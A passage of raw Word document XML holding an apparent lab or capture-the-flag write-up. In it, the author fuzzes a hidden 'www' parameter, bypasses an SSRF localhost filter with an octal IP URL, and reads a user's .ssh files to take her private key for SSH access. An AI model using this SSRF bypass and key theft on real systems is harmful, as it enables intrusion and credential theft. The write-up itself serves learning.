        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A6C2F">
        <w:t>But before I executed the attack, I saved the packet in a .ffuf file and changed the parameter name to “FUZZ”</w:t>
      </w:r>
      <w:r w:rsidR="009A2520">
        <w:t xml:space="preserve">. I addition, I changed the “Connection” parameter from “keep-alive” to “close” because </w:t>
      </w:r>
      <w:r w:rsidR="009A2520" w:rsidRPr="009A2520">
        <w:t xml:space="preserve">the server </w:t>
      </w:r>
      <w:r w:rsidR="00D811F6" w:rsidRPr="009A2520">
        <w:t>has</w:t>
      </w:r>
      <w:r w:rsidR="009A2520" w:rsidRPr="009A2520">
        <w:t xml:space="preserve"> limits on how many requests can reuse a single connection (keep-alive means that keep the communication open for more packets after this one) and if ffuf sends too many requests on the same connection, the server may drop the parameter or not noticing them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB66C65" w14:textId="26DAB9DD" w:rsidR="002B4F52" w:rsidRDefault="002B4F52" w:rsidP="009A2520">
      <w:r>
        <w:t>This is the final packet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117BDEB9" w14:textId="3FD8AF55" w:rsidR="0053274A" w:rsidRDefault="0053274A" w:rsidP="005D2E84">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0111E1B2" wp14:editId="05CDCDC0">
            <wp:extent cx="7556500" cy="3051175"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1923693863"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3693863" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7556500" cy="3051175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005D2E84">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45F02370" wp14:editId="7CDD84A3">
            <wp:extent cx="7556500" cy="5245735"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1705919839"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5919839" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7556500" cy="5245735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECF09ED" w14:textId="4119E249" w:rsidR="00CD446F" w:rsidRDefault="00CD446F" w:rsidP="00CD446F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>I found the parameter “www”. Now, I want to see the result of using this parameter</w:t>
      </w:r>
      <w:r w:rsidR="00632472">
        <w:t xml:space="preserve"> in burp</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DC3693" w14:textId="3739E203" w:rsidR="00CD50BC" w:rsidRDefault="00632472" w:rsidP="004A72F6">
      <w:r w:rsidRPr="00632472">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26651A72" wp14:editId="0FB44E73">
            <wp:extent cx="4637172" cy="2400508"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="93013489"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013489" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4637172" cy="2400508"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAAC95C" w14:textId="7DDF147E" w:rsidR="004A72F6" w:rsidRDefault="004A72F6" w:rsidP="004A72F6">
      <w:r>
        <w:t>Unfortunately, I got an error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE5FED5" w14:textId="17161BE4" w:rsidR="004A72F6" w:rsidRDefault="00822185" w:rsidP="004A72F6">
      <w:r w:rsidRPr="00822185">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4638CA3A" wp14:editId="69A4DEE9">
            <wp:extent cx="3734124" cy="2038527"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="190182220" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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182220" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3734124" cy="2038527"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C8096E" w14:textId="77777777" w:rsidR="0018240B" w:rsidRDefault="0018240B" w:rsidP="004A72F6">
      <w:r>
        <w:t>I tried to change the url on the www parameter to have the target’s IP or the word “localhost” followed by port 8080 but it returned me another error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6198E9CF" w14:textId="633BF249" w:rsidR="00822185" w:rsidRDefault="0018240B" w:rsidP="004A72F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DCAB6E9" wp14:editId="3A5B5BA7">
            <wp:extent cx="5104837" cy="2524964"/>
            <wp:effectExtent l="0" t="0" r="635" b="8890"/>
            <wp:docPr id="1772580028" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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2580028" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5112882" cy="2528943"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD6546" w14:textId="0235FFF8" w:rsidR="0018240B" w:rsidRDefault="0018240B" w:rsidP="003D4BD4">
      <w:r>
        <w:t xml:space="preserve">From this point, I understood that </w:t>
      </w:r>
      <w:r w:rsidR="00E059B4">
        <w:t>probably there is an SSRF</w:t>
      </w:r>
      <w:r w:rsidR="00C078B8">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C078B8">
        <w:t>host whitelist</w:t>
      </w:r>
      <w:r w:rsidR="00E059B4">
        <w:t xml:space="preserve"> filter that prevents me from accessing resources</w:t>
      </w:r>
      <w:r w:rsidR="00B87726">
        <w:t xml:space="preserve"> using the keywords “localhost” and other similar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B87726">
        <w:t>onces</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00696B58">
        <w:t xml:space="preserve"> (like “127.0.0.1” and “0.0.0.0”)</w:t>
      </w:r>
      <w:r w:rsidR="00E059B4">
        <w:t>. This led me to start googling</w:t>
      </w:r>
      <w:r w:rsidR="000713F0">
        <w:t xml:space="preserve"> for other</w:t>
      </w:r>
      <w:r w:rsidR="00E059B4">
        <w:t xml:space="preserve"> ways to </w:t>
      </w:r>
      <w:r w:rsidR="00802222">
        <w:t>solve</w:t>
      </w:r>
      <w:r w:rsidR="00E059B4">
        <w:t xml:space="preserve"> this issue. I found </w:t>
      </w:r>
      <w:r w:rsidR="00260CAA">
        <w:t xml:space="preserve">that there are bunch of ways to bypass the filtering and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00260CAA">
        <w:t>anfer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00260CAA">
        <w:t xml:space="preserve"> trying a few of them, I found that </w:t>
      </w:r>
      <w:r w:rsidR="003D4BD4">
        <w:t>“www=</w:t>
      </w:r>
      <w:r w:rsidR="009B0E8F" w:rsidRPr="003D4BD4">
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="009B0E8F" w:rsidRPr="003D4BD4">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>0177.0.0.1</w:t>
      </w:r>
      <w:r w:rsidR="009B0E8F" w:rsidRPr="003D4BD4">
        <w:t>:80/</w:t>
      </w:r>
      <w:r w:rsidR="003D4BD4" w:rsidRPr="003D4BD4">
        <w:t>upload</w:t>
      </w:r>
      <w:r w:rsidR="003D4BD4">
        <w:t>s/Untitled.png”</w:t>
      </w:r>
      <w:r w:rsidR="009B0E8F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00260CAA">
        <w:t xml:space="preserve">worked for me because it returned this http 200 </w:t>
      </w:r>
      <w:r w:rsidR="00BB4F4D">
        <w:t xml:space="preserve">response </w:t>
      </w:r>
      <w:r w:rsidR="00BD0A55">
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="0023591E">
        <w:t xml:space="preserve"> contains the image’s file content</w:t>
      </w:r>
      <w:r w:rsidR="00260CAA">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D686F5D" w14:textId="6F10A442" w:rsidR="009B0E8F" w:rsidRDefault="0023591E" w:rsidP="009B0E8F">
      <w:r w:rsidRPr="0023591E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C7A7986" wp14:editId="3DFF30F8">
            <wp:extent cx="4172312" cy="3036833"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="511067344" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן, מספר&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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1067344" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן, מספר&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4172312" cy="3036833"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="488034C5" w14:textId="20A1A0E0" w:rsidR="00260CAA" w:rsidRDefault="002C1A4A" w:rsidP="004A72F6">
      <w:r>
        <w:t>After this successful trial</w:t>
      </w:r>
      <w:r w:rsidR="009A31FE">
        <w:t>,  I thought to try and read the /etc/passwd file to find the target’s users</w:t>
      </w:r>
      <w:r>
        <w:t>, b</w:t>
      </w:r>
      <w:r w:rsidR="00DE78D2">
        <w:t xml:space="preserve">ut I </w:t>
      </w:r>
      <w:r w:rsidR="008650EC">
        <w:t>faced</w:t>
      </w:r>
      <w:r w:rsidR="00DE78D2">
        <w:t xml:space="preserve"> this error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0984BC21" w14:textId="2BF4B471" w:rsidR="009A31FE" w:rsidRDefault="002C1A4A" w:rsidP="004A72F6">
      <w:r w:rsidRPr="002C1A4A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65BB2D90" wp14:editId="3884D8E8">
            <wp:extent cx="4667654" cy="1474598"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1998282912" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן, אלגברה&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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8282912" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן, אלגברה&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4667654" cy="1474598"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="034C4CBA" w14:textId="36003683" w:rsidR="005B0EFF" w:rsidRDefault="00A275B2" w:rsidP="004A72F6">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00B05E4B">
        <w:t xml:space="preserve"> tried several </w:t>
      </w:r>
      <w:r w:rsidR="00773BB1">
        <w:t>other common names of files but none of them worked.</w:t>
      </w:r>
      <w:r w:rsidR="00931A21">
        <w:t xml:space="preserve"> Then, I moved to fuzzing again the </w:t>
      </w:r>
      <w:r w:rsidR="001E7995">
        <w:t>files over the target using the “www” parameter and the url that bypassed the SSRF filter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4AD6F9" w14:textId="1715A4BA" w:rsidR="00773BB1" w:rsidRDefault="00257737" w:rsidP="004A72F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="345D2792" wp14:editId="40A83156">
            <wp:extent cx="7556500" cy="2325370"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1069113459" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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9113459" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7556500" cy="2325370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D74CE" w14:textId="77777777" w:rsidR="00F65D5D" w:rsidRDefault="00F65D5D" w:rsidP="004A72F6">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2930C239" w14:textId="6975A590" w:rsidR="00B35185" w:rsidRDefault="00F65D5D" w:rsidP="004A72F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6588DBA0" wp14:editId="35F74097">
            <wp:extent cx="7556500" cy="3864610"/>
            <wp:effectExtent l="0" t="0" r="6350" b="2540"/>
            <wp:docPr id="176013137" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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013137" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7556500" cy="3864610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="383B1936" w14:textId="7A080F7E" w:rsidR="001E7995" w:rsidRDefault="00F65D5D" w:rsidP="00E70CA2">
      <w:r>
        <w:t xml:space="preserve">By connecting the names of the files </w:t>
      </w:r>
      <w:r w:rsidR="00394066">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">directories I understood that I’m inside a user directory and </w:t>
      </w:r>
      <w:r w:rsidR="002A3701">
        <w:t xml:space="preserve">maybe I can use the .ssh folder to access the target by </w:t>
      </w:r>
      <w:r w:rsidR="00162111">
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="00A24C79">
        <w:t xml:space="preserve"> ssh </w:t>
      </w:r>
      <w:r w:rsidR="0072039E">
        <w:t>open port:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E21FB44" w14:textId="1FE5B8F0" w:rsidR="00E70CA2" w:rsidRDefault="0006608C" w:rsidP="00E70CA2">
      <w:r w:rsidRPr="0006608C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AF49E50" wp14:editId="5A9BD0B8">
            <wp:extent cx="4210415" cy="2038527"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1655171788" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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5171788" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4210415" cy="2038527"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2633BE" w14:textId="7EA32CCA" w:rsidR="0006608C" w:rsidRDefault="006548D6" w:rsidP="00E70CA2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54FA32F9" wp14:editId="669303B2">
            <wp:extent cx="3924300" cy="2222671"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="255651026" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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5651026" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3924300" cy="2222671"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18425AA5" w14:textId="77777777" w:rsidR="00115FED" w:rsidRDefault="00115FED" w:rsidP="00E70CA2"/>
    <w:p w14:paraId="37ACD82B" w14:textId="77777777" w:rsidR="00115FED" w:rsidRDefault="00115FED" w:rsidP="00E70CA2"/>
    <w:p w14:paraId="277CBE98" w14:textId="2940E363" w:rsidR="006548D6" w:rsidRDefault="006548D6" w:rsidP="00E70CA2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now, I tried to see the content of the authorized_keys</w:t>
      </w:r>
      <w:r w:rsidR="00F51009">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661ECFF0" w14:textId="5C764AA6" w:rsidR="00115FED" w:rsidRDefault="00115FED" w:rsidP="00E70CA2">
      <w:r w:rsidRPr="00115FED">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="411A9C4B" wp14:editId="2E284AB5">
            <wp:extent cx="4103726" cy="2267146"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="569972156" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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9972156" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4103726" cy="2267146"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="481CFB4A" w14:textId="74345269" w:rsidR="00115FED" w:rsidRDefault="00115FED" w:rsidP="00E70CA2">
      <w:r>
        <w:t>And I found it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404821BD" w14:textId="31C0C4D3" w:rsidR="00115FED" w:rsidRDefault="00F71260" w:rsidP="00E70CA2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B4B8DD8" wp14:editId="4ADA8733">
            <wp:extent cx="4897873" cy="2032000"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="208991274" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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991274" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4902260" cy="2033820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6548988D" w14:textId="523EE117" w:rsidR="00CD323C" w:rsidRDefault="00CD323C" w:rsidP="00E70CA2">
      <w:r>
        <w:t>I also read the content of the id_rsa file and found th</w:t>
      </w:r>
      <w:r w:rsidR="00415CF1">
        <w:t>e ssh rsa private key of beth</w:t>
      </w:r>
      <w:r w:rsidR="00A14AD7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64308D15" w14:textId="45744D74" w:rsidR="005B1369" w:rsidRDefault="00A14AD7" w:rsidP="005B1369">
      <w:r>
        <w:t>From now on, I understood that I can get a shell over the target using beth</w:t>
      </w:r>
      <w:r w:rsidR="00526B2C">
        <w:t>’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> username and</w:t>
      </w:r>
      <w:r w:rsidR="000F23CA">
        <w:t xml:space="preserve"> its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F23CA">
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key</w:t>
      </w:r>
      <w:r w:rsidR="005B1369">
        <w:t xml:space="preserve">. I saved the key in a file named “beth_private_key” and give the </w:t>
      </w:r>
      <w:r w:rsidR="00EA0A8C">
        <w:t>600</w:t>
      </w:r>
      <w:r w:rsidR="005B1369">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B73D25">
        <w:t xml:space="preserve">code </w:t>
      </w:r>
      <w:r w:rsidR="005B1369">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="004A6167">
        <w:t>privileges</w:t>
      </w:r>
      <w:r w:rsidR="005B1369">
        <w:t xml:space="preserve"> to this file using chmod:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE6E792" w14:textId="22B3A5DE" w:rsidR="00343D3F" w:rsidRDefault="00343D3F" w:rsidP="005B1369">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60EEEF1E" wp14:editId="6AE0E2F4">
            <wp:extent cx="4182533" cy="2214984"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="1828888400" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, תוכנה, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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8888400" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, תוכנה, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4190413" cy="2219157"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="558BF98A" w14:textId="1D73E98A" w:rsidR="00A14AD7" w:rsidRDefault="005B1369" w:rsidP="005B1369">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E76F1E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02D314B3" wp14:editId="601359ED">
            <wp:extent cx="4309533" cy="515721"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="428979185"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8979185" name="תמונה 1"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4316228" cy="516522"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
